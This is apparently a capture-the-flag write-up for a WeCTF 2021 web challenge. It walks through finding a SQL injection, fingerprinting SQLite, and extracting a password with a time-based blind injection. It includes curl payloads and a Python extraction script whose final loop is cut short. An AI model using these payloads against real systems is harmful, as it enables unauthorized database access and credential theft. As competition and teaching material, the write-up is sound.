Tags: sqli web 


# Phish

From the start testing - ```curl http://phish.sf.ctf.so/add --data"username=test&password=test2'``` will returns an SQL error which means it's vulnerible to SQLi.

Testing ```curl http://phish.sf.ctf.so/add --data "username=' UNION SELECT 1,2 #&password=test2"``` returns ```unrecognized token: "#"```

The database is not MySQL so let's run an SQL query to try to find what DB it is.

With MySQL the page should load in 5 seconds.. `' UNION SELECT 1,IF(LENGTH(password))>0,SLEEP(5),'true') FROM user` -- Instead it returns `no such function: IF`

This error is unique to SQLite. So now we know we need to convert to a SQLite query.

This query should will load in 4-5 seconds if password length is > 0. `curl http://phish.sf.ctf.so/add --data "username=shou&password=', '') UNION SELECT 1,CASE WHEN LENGTH(password)>0 THEN randomblob(500000000) END FROM user WHERE username = 'shou'--"`

It's a successful query and loads in ~4 seconds. So I wrote a program (included below) to extract all 64 characters of the flag.

import requests

FLAG = []
INJECTION_STRING = "', '') UNION SELECT 1,CASE WHEN unicode(substr(password, {}, {})){}{} THEN randomblob(500000000) END FROM user WHERE username = 'shou'--"

def guess_exact(offset, starting_ascii):
global FLAG
for current_ascii in range(starting_ascii-10, starting_ascii):
print(f'Testing {chr(current_ascii)}')
POST_DATA = {"password": INJECTION_STRING.format(offset,offset,'=',current_ascii), "username": "shou"}
load_time = requests.post("http://phish.sf.ctf.so/add", data=POST_DATA).elapsed.total_seconds()
print(f'Load time: {load_time}')
if(load_time > 3):
FLAG.insert(offset, chr(current_ascii))

def guess_letter_range(offset):
for current_ascii in range(30,131):
if current_ascii % 10 == 0:
POST_DATA = {"password": INJECTION_STRING.format(offset,offset,'<',current_ascii), "username": "shou"}
print(f'Testing letters between {chr(current_ascii-10)}-{chr(current_ascii)}')
load_time = requests.post("http://phish.sf.ctf.so/add", data=POST_DATA).elapsed.total_seconds()
print(f'Load time: {load_time}')
if load_time > 3:
print(f'Searching exact letter between {chr(current_ascii-10)}-{chr(current_ascii)}')
guess_exact(offset, current_ascii)

for offset in range(1, 64): # 64 is the size of the flag - based from manual testing

FLAG: we{e0df7105-edcd-4dc6-8349-f3bef83643a9@h0P3_u_didnt_u3e_sq1m4P}

Original writeup (https://github.com/19201/WeCTF-2021/blob/main/README.md).